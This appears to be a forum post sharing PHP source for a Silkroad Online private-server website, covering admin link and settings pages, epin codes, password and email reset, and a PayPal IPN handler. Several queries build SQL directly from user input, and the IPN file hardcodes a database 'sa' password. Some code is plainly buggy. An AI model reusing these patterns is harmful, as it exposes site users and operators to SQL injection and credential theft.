        <td>Delete</td>
    <tr/>

                             
                             <?php $hLinkList = core::$sql -> exec("select * from srcms_downloads");
                             if(mssql_num_rows($hLinkList) > 0)
                             {
                                while($row = mssql_fetch_array($hLinkList))
                                {?>
    <tr>
        <td><?php echo $row[id];?></td>
        <td><?php echo $row[name];?></td>
        <td><?php echo $row[link];?></td>
        <td><?php echo $row[description];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=dl&subact=del&id=<?php echo $row[id];?>' class="btn-u pull-right">Delete</a></td>
    <tr/>
                                <?php }
                             }
                             else
                             {
                                echo "No links added yet.<br/>";
                             }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $nID = (int)$_GET['id'];
                        if(core::$sql -> numRows("select * from srcms_downloads where id='$nID'") > 0)
                        {
                            core::$sql -> exec("delete from srcms_downloads where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Link successfully deleted. <?php echo misc::redirect('?pg=admin&act=dl', 3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                        else
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        You are trying to delete link with ID that was not found in database. <?php echo misc::redirect('?pg=admin&act=dl', 3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }    
                    
                    }
                break;
                
                case('edit'):
                    if(!isset($_POST['submit']) && !isset($_GET['id']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Uploaded on</td>
        <td>Link</td>
        <td>Name/Time</td>
        <td>Edit</td>
    <tr/>
                                
                                <?php $hLinks = core::$sql -> exec("select * from srcms_downloads");
                                if(mssql_num_rows($hLinks) > 0)
                                {
                                    while($row = mssql_fetch_array($hLinks))
                                    {?>
    <tr>
    <td><?php echo $row[id];?></td>
        <td><?php echo $row[name];?></td>
        <td><?php echo $row[link];?></td>
        <td><?php echo $row[description];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=dl&subact=edit&id=<?php echo $row[id];?>' class="btn-u pull-right">Edit</td>
    <tr/>
                                    <?php }
                                }
                                else
                                {
                                    echo "No links added yet.<br/>";
                                    
                                    break;
                                }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $nID = (int)$_GET['id'];
                        $hLinkData = core::$sql -> exec("select * from srcms_downloads where id='$nID'");
                        if(mssql_num_rows($hLinkData) > 0)
                        {    
                            if(!isset($_POST['link']))
                            {
                                $hArray = mssql_fetch_array($hLinkData);?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        <form class="reg-page" method="post" role="form">
            <h3>Edit Download(<?php echo $hArray[name];?>)</h3>
                <div class="controls">
                    <label>Uploaded on<span class="color-red">*</span></label>
                    <div class="input-prepend">
                        <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                        <input type="text" name="title" autocomplete="off" style="width: 165%" value="<?php echo $hArray[name];?>"/>
                    </div>
                    <label>Link<span class="color-red">*</span></label>
                    <div class="input-prepend">
                        <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                        <input type="text" name="title" autocomplete="off" style="width: 165%" value="<?php echo $hArray[link];?>"/>
                    </div>
                    <label>Name/Time<span class="color-red">*</span></label>
                    <div class="input-prepend">
                        <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                        <input type="text" name="title" autocomplete="off"  style="width: 165%" value="<?php echo $hArray[description];?>"/>
                    </div>
                </div>

            <div class="controls form-inline">
                <?php echo misc::back();?>
                <input type="submit" name="submit" class="btn-u pull-right" value="Save">
            </div>
        </form>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php }
                            else
                            {
                                if(!security::isValidUrl($_POST['link']))
                                {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Invalid URL<br/> <?php echo misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php }
                                else
                                {
                                    $szName = misc::toHTML($_POST['name']);
                                    $szDesc = misc::toHTML($_POST['description']);
                                    core::$sql -> exec("update srcms_downloads set name='$szName',description='$szDesc',link='$_POST[link]' where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Link successfully edited <br/> <?php echo isc::redirect('?pg=admin&act=dl', 3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php }
                            }
                        }
                        else
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Record with ID you requested was not found in database.. <?php echo misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php break;
                        }
                    }
                    
                break;
                default:echo "Unknown subaction"; break;
            }
            #echo "<br/>";
            #misc::back();
        }
    break;
    
    case('settings'):
        if($_POST['submit'] != 'Save')
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Settings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Settings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="reg-page table table-striped" border="0" cellpadding="0" cellspacing="0">
    <form method='post'>
    <tr>
        <td>ValueName</td>
        <td>Value</td>
    <tr/>
            <?php $hSettings = core::$sql -> exec("select * from srcms_settings");
            while($row = mssql_fetch_array($hSettings))
            {?>
    <tr>
        <td><?php echo $row[valueName];?></td>
        <td>
            <div class="input-prepend">
                <span class="add-on"><i class="icon-certificate color-green"></i></span>
                <input type='text' name='<?php echo $row[valueName];?>' value='<?php echo $row[value];?>'>
            </div>
        </td>
    <tr/>
    <?php } ?>
    <tr>
        <td></td>
        <td>
            <div class="controls form-inline">
                <?php echo misc::back();?>
                <input type="submit" name="submit" class="btn-u pull-right" value="Save">
            </div>
        </td>
    </tr>
    </form>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
        <?php }
        else
        {
            foreach($_POST as $nElement => $nElementValue)
            {
                    core::$sql -> exec("update srcms_settings set value='$nElementValue' where valueName='$nElement'");
            }?>            
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit Settings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit Settings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Settings saved.<br/><?php echo misc::redirect('?pg=admin&act=settings',3 );?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
        <?php }
    break;
    
    case('epin'):
        if(!isset($_GET['subact']))
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Epin System</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Epin System</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<ul class="unstyled">
    <li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=epin&subact=gen'><b>Generate new epin code</b></a></li>
    <li><i class="icon-eye-open color-green"></i> <a href='?pg=admin&act=epin&subact=lookup'><b>Lookup codes</b></a></li>
</ul>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
        <?php }
        else
        {
            switch($_GET['subact'])
            {
                case('gen'):
                    if(!isset($_POST['submit']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Generate new Epin code</h3>
                    <div class="controls">
                        <label>Silk Amount<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text"  name='silkAmount' autocomplete="off" maxlength="16" placeholder="Silk Amount" style="width: 165%" class=""/>
                        </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value='Generate new epin'>
                    </div>
            </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $nRandCode = rand(1000000000,2000000000);
                        if(core::$sql -> numRows("select * from srcms_epin where code='$nRandCode'") == 0)
                        {
                            $nSilk = (int)$_POST['silkAmount'];
                            core::$sql -> exec("insert into srcms_epin(code,silkAmount) values('$nRandCode','$nSilk')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Epin generated, CODE: <b class="color-red"><?php echo $nRandCode;?></b>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                        else
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Please, re-generate code. <?php echo misc::back();?></b>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php break;
                        }
                    }
                break;
                
                case('lookup'):
                    if(core::$sql -> numRows("select * from srcms_epin") > 0)
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        <table class="reg-page table table-striped" border="0" cellpadding="0" cellspacing="0">
            <tr>
                <td>Code</td>
                <td>Silk</td>
            <tr/>
<?php $hCodesData = core::$sql -> exec("select * from srcms_epin");
     while($row = mssql_fetch_array($hCodesData))
        {?>
            <tr>
                <td><b class="color-red"><?php echo $row[code];?></b></td>
                <td><b class="color-green"><?php echo $row[silkAmount];?></b></td>
            <tr/>
    <?php }?>
        </table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Generate new Epin code</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Generate new Epin code</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Please, generate some epin codes first.
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                break;
                
                default:echo "Unknown subaction<br/>";break;
            }
            
            #echo "<br/>";
            #misc::back();
        }
    break;
    
    
    default:
    echo "Unknown action";
    break;
}
?>

cem

كود PHP:

<?php
    if(isset($_GET['uid']))
    {
        if(security::isSecureString($_GET['uid'], 3))
                {
                $uid = $_GET['uid'];
            if(core::$sql -> numRows("select * from PW_Restore where RandomPASS = '$uid'") == 0)
            {
                echo 'this UID is incorrect or have been changed , request a new UID.';
            } else {
                if(isset($_POST['submit']))
                {
                //process data
                if(!security::isSecureString($_POST['password_new'], 3)) $errors[] = "Password [new] contains forbidden symbols";
                if(strlen($_POST['password_new']) > 32)    $errors[] = "Password [new] too long";
                if(strlen($_POST['password_new']) < 6)    $errors[] = "Passwrod [new] too short";
                if($_POST['password_new'] !== $_POST['password_new_confirm']) $errors[] = "New Passwords does not match!.";

                if(count($errors) > 0)
                {
                foreach($errors as $nElement)
                {
                echo $nElement.".<br/>";
                }
                misc::back();
                }
                else
                {
                //verify
                if(user::RestorePass($_GET['uid'], $_POST['password_new']))
                {
                echo "Password changed successfully. <br/>";
                misc::redirect('?pg=news', 1);
                }
                else
                {
                echo "Invalid old password specified.<br/>";
                misc::back();
                }
                }
                }
                else core::$ucp -> ForgotpwForm();
                }
    } } else {
    echo 'Entry is invalid.';
    }
?>

emailreplace

كود PHP:

<?php
        if (isset($_POST['replacemail1'])) {
    
        if(!security::isSecureString($_SESSION['username'], 3)) $errors[] = "Username field contains forbidden symbols";
        if(!security::isSecureString($_POST['email'], 2))     $errors[] = "Email field contains forbidden symbols";
        if(!security::isCorrectEmail($_POST['email']))         $errors[] = "Invalid email address";

        if(count($errors) > 0)
        {
            for($i = 0; $i < count($errors); $i++)
            {
                echo $errors[$i].".<br/>";
            }
        }
        else
        {
        
        core::$sql -> changeDB('acc');
        $user = $_SESSION['username'];
        $email = $_POST['email'];
        if (empty($_SESSION['username']) || empty($_POST['email'])) {
            echo 'Error :';
            echo '<br />';
            echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
            unset($_POST['replacemail1']);
        } else {
            $check = core::$sql -> numRows("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
            if ($check !== 1) {
                echo 'Error :';
                echo '<br />';
                echo "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>";
                unset($_POST['replacemail1']);
            } else {
                $title = "Your Email Change Link!";
                $getrandom = misc::genRandomString();
                $datetime = gmDate('Y-m-d H:i:s');
                $content = "HolySro Email Change Link : http://holysro.com/?pg=cem&uid=$getrandom \n Get inside to change your Email \n if you didnt request it , please ignore this mail.!";
                mail($email, "[HolySro Email Change] ".$title, $content."\nEmail sent from: www.holysro.com");
                core::$sql -> changeDB('acc');
                $ZsCheck = core::$sql -> numRows("select UserID from Email_Change where UserID = '$user'");
                if ($ZsCheck == 1) {
                core::$sql -> exec("update Email_Change set RandomPASS ='$getrandom' ,createtime = '$datetime',ipaddr = '$_SERVER[REMOTE_ADDR]' where UserID = '$user'");
                } else {
                core::$sql -> exec("insert into Email_Change(UserID,RandomPASS,createtime,ipaddr) values('$user','$getrandom','$datetime','$_SERVER[REMOTE_ADDR]')");
                }
                echo "instructions to Email Change sent to your mailbox [ $email ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>";
                unset($_POST['replacemail1']);
                misc::redirect("?pg=news", 2);
            }
        }
    } } else {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left">Change your email</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Change your email</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <form class="log-page" role="form" method="post" action=""/>
            <h3>Change your email</h3>    
            <div class="input-prepend">
                <span class="add-on"><i class="icon-user"></i></span>
                <input class="input-xlarge" autocomplete="off" onfocus="clearText(this);" type="text" maxlength="32" name="email" placeholder="example: [email protected]" />
            </div>

            <div class="controls form-inline">
                <input class="btn-u pull-right" type="submit" name="replacemail1" value="Send Me Link To Mail" />
            </div><br />
        </form>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
<?php }?>

forgotpw

كود PHP:

<?php
        global $core;
        if (isset($_POST['forgotpassword'])) {
    
        if(!security::isSecureString($_POST['username'], 3)) $errors[] = "Username field contains forbidden symbols";
        if(!security::isSecureString($_POST['email'], 2))     $errors[] = "Email field contains forbidden symbols";
        if(!security::isCorrectEmail($_POST['email']))         $errors[] = "Invalid email address";

        if(count($errors) > 0)
        {
            for($i = 0; $i < count($errors); $i++)
            {
                echo $errors[$i].".<br/>";
            }
        }
        else
        {
        
        core::$sql -> changeDB('acc');
        $user = $_POST['username'];
        $email = $_POST['email'];
        if (empty($_POST['username']) || empty($_POST['email'])) {
            echo 'Error :';
            echo '<br />';
            echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
            unset($_POST['forgotpassword']);
        } else {
            $check = core::$sql -> numRows("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
            if ($check !== 1) {
                echo 'Error :';
                echo '<br />';
                echo "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>";
                unset($_POST['forgotpassword']);
            } else {
                $passw = core::$sql -> exec("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
                while($row = mssql_fetch_array($passw)) {
                    $pass = $row['Name'];
                }
                $title = "Your password!";
                $getrandom = misc::genRandomString();
                $datetime = gmDate('Y-m-d H:i:s');
                $getsiteurl = $_SERVER['SERVER_NAME'];
                $servername = $core -> aConfig['serverName'];
                $content = "$servername Password Reset Link : http://$getsiteurl/?pg=cpw&uid=$getrandom \n Get inside to change your password \n if you didnt request it , please ignore this mail.!";
                mail($email, "[$servername Password Recovery] ".$title, $content."\nEmail sent from: $getsiteurl");
                core::$sql -> changeDB('acc');
                $ZsCheck = core::$sql -> numRows("select UserID from PW_Restore where UserID = '$user'");
                if ($ZsCheck == 1) {
                core::$sql -> exec("update PW_Restore set RandomPASS ='$getrandom' ,createtime = '$datetime',ipaddr = '$_SERVER[REMOTE_ADDR]' where UserID = '$user'");
                } else {
                core::$sql -> exec("insert into PW_Restore(UserID,RandomPASS,createtime,ipaddr) values('$user','$getrandom','$datetime','$_SERVER[REMOTE_ADDR]')");
                }?>
         <!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left">Reset Password</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li class="active">Reset Password</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">       
                
<!-- News -->
<div class="row-fluid purchase margin-bottom-30">
    <div class="container">
        <div class="span8">    
            <div class="headline">
                <h3>Instructions</h3>
            </div>    
                   instructions to reset your password sent to your mailbox [ <code><?php echo $email;?></code> ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>
                <?php unset($_POST['forgotpassword']);?>            
        </div>              
    </div>
</div><!--/row-fluid--><!-- End Purchase Block -->

    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
            <?php }
        }
    } } else {?>
        
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left">Reset Password</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Reset Password</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <form class="log-page" action="" method="post">
            <h3>Reset Password</h3>
                        <p>To start the procedure, please enter your username and mail.</p>
            <div class="input-prepend">
                <span class="add-on"><i class="icon-user"></i></span>
                <input class="input-xlarge" type="text" maxlength="16" name="username" autocomplete="off" onfocus="clearText(this);" placeholder="Username">
            </div>
            
            <div class="input-prepend">
                <span class="add-on"><i class="icon-lock"></i></span>
                <input class="input-xlarge" autocomplete="off" onfocus="clearText(this);" type="text" maxlength="32" name="email" placeholder="[email protected]">
            </div>
            <div class="controls form-inline">
                <button class="btn-u pull-right" class="button" type="submit" name="forgotpassword" value="Request Password">Submit</button>
            </div>
            <br />
        </form>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php }

?>

forums

كود PHP:

<?php
        global $core;
        echo "Redirecting...";
        misc::redirect($core -> aConfig['forumLink'], 2);
?>

ipn

كود PHP:

<?php
$con = mssql_connect('WIN-58LMRAF4MSQ\SQLEXPRESS','sa','hkjhldkdhq@012012')  //  Edit to your Settings (SQL,ID,PW) .
    or die('Could not connect to the server!');
    
// Select a database:
mssql_select_db('SRO_VT_ACCOUNT_Tito')  // Edit to you Account Database!! .
    or die('Could not select a database.');

$ppEmail = '[email protected]'; // Edit This Email to your Paypal!!! .
$personalEmail = '[email protected]'; // Edit This Email to your Paypal!!! . 
$amountUsd = array('5.00','10.00','15.00','25.00','50.00');// Edit The Price Here ! (must be double (XX.XX)!) .
$usdToSilks = array(5=>300, 10=>700, 15=>1100, 25=>2000, 50=>4500);// Edit Silks From Price 10=>500 [10$ = 500 Silk] .

//$amountEur = array(7.00,10.00,14.00,21.00);

// tell PHP to log errors to ipn_errors.log in this directory
ini_set('log_errors', true);
ini_set('error_log', dirname(__FILE__).'/ipn_errors.log');

// intantiate the IPN listener
include('ipnlistener.php');
$listener = new IpnListener();

// tell the IPN listener to use the PayPal test sandbox
$listener->use_sandbox = false;

// try to process the IPN POST
try {
    $listener->requirePostMethod();
    $verified = $listener->processIpn();
} catch (Exception $e) {
    error_log($e->getMessage());
    exit(0);
}

if ($verified) {

    $errmsg = '';   // stores errors from fraud checks
    
    // Make sure the payment status is "Completed" 
    if ($_POST['payment_status'] != 'Completed') { 
        // simply ignore any IPN that is not completed
        exit(0); 
    }

    //  Make sure seller email matches your primary account email.
    if ($_POST['receiver_email'] != $ppEmail) {
        $errmsg .= "'receiver_email' does not match: ";
        $errmsg .= $_POST['receiver_email']."\n";
    }
    
    //checks currency
    if ($_POST['mc_currency'] != 'USD') {
        $errmsg .= "'mc_currency' does not match: ";
        $errmsg .= $_POST['mc_currency']."\n";
    }
    
    // Make sure the amount(s) paid match
    if ($_POST['mc_currency'] = 'USD') {
        if (!in_array($_POST['mc_gross'],$amountUsd)) {
        $errmsg .= "'mc_gross' does not match: ";
        $errmsg .= $_POST['mc_gross']."\n";
        }        
    }
    
/*    if ($_POST['mc_currency'] = 'EUR') {
           if (!in_array(number_format($_POST['mc_gross'],2),number_format($amountEur, 2))) {
        $errmsg .= "'mc_gross' does not match: ";
        $errmsg .= $_POST['mc_gross']."\n";
        }        
    }
*/    

    // Ensure the transaction is not a duplicate.
    
    $txn_id = ms_escape_string($_POST['txn_id']);
    
    $sql = "SELECT * FROM paypal WHERE txn_id = '$txn_id'";
    $r = mssql_query($sql);
    
    if (!$r) {
        error_log(mysql_error());
        exit(0);
    }
    
   // $exists = mssql_query($r, 0);
    $exists = mssql_num_rows($r);
    mssql_free_result($r);
    
    if ($exists<>0) {
        $errmsg .= "'txn_id' has already been processed: ".$_POST['txn_id']."\n";
    }
    
    if (!empty($errmsg)) {
    
        // manually investigate errors from the fraud checking
        $body = "IPN failed fraud checks: \n$errmsg\n\n";
        $body .= $listener->getTextReport();
        mail($personalEmail, 'Paypal Buyer Notice!', $body);
        error_log($body); exit(0);
        
    } else {
    
        $payer_email = ms_escape_string($_POST['payer_email']);
        $mc_gross = ms_escape_string($_POST['mc_gross']);
        $username = ms_escape_string($_POST['custom']);
        $timenow = date("y-m-d H:i:s", time());
        
        $sql = "INSERT INTO paypal (txn_id,payer_email,mc_gross,username,date)VALUES  
                ('$txn_id', '$payer_email', $mc_gross, '$username', '$timenow')"; // Add A logs of buys for server owner [Naty48] .
        
        if (!mssql_query($sql)) {
            error_log(mysql_error());
            exit(0);
        }
        
        //silk update [NATY48]
        $silkAmount = $usdToSilks[(int)$mc_gross];
        mssql_query("exec CGI.CGI_WebPurchaseSilk 0,'$username',0,$silkAmount,0"); // will execute automated in game update of silks.

    }
    
} else {
    // manually investigate the invalid IPN .
  //  mail($personalEmail, 'Invalid IPN', $listener->getTextReport());
}
function ms_escape_string($data) {
        if ( !isset($data) or empty($data) ) return '';
        if ( is_numeric($data) ) return $data;

        $non_displayables = array(
            '/%0[0-8bcef]/',            // url encoded 00-08, 11, 12, 14, 15
            '/%1[0-9a-f]/',             // url encoded 16-31
            '/[\x00-\x08]/',            // 00-08
            '/\x0b/',                   // 11
            '/\x0c/',                   // 12
            '/[\x0e-\x1f]/'             // 14-31
        );
        foreach ( $non_displayables as $regex )
            $data = preg_replace( $regex, '', $data );
        $data = str_replace("'", "''", $data );
        return $data;
    }
?>

ipnlistener

كود PHP:

<?php

class IpnListener {
    
    public $use_curl = true;     
    
    public $force_ssl_v3 = false;     
    
    /**
